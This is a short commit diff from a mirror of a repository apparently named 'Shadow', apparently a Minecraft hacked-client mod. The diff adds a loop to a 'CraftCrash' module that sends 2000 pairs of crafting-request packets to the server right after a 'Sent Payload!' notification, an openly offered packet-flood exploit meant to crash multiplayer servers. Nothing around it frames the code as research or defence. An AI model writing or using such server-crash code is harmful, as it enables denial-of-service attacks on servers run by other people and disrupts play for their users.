mirror of
https://github.com/Miasmusa/Shadow.git
synced 2024-11-14 19:04:54 -05:00
r
This commit is contained in:
parent
5613aa913f
commit
f00b3f0ddb
1 changed files with 4 additions and 0 deletions
|
@ -68,6 +68,10 @@ public class CraftCrash extends Module {
|
|||
}
|
||||
if(ticks % 75 == 0){
|
||||
Notification.create(1000, "CraftCrash", Notification.Type.SUCCESS, "Sent Payload!");
|
||||
for(int i = 0; i < 2000; i++){
|
||||
client.player.networkHandler.sendPacket(new CraftRequestC2SPacket(sync, stick, true));
|
||||
client.player.networkHandler.sendPacket(new CraftRequestC2SPacket(sync, buton, true));
|
||||
}
|
||||
this.setEnabled(false);
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in a new issue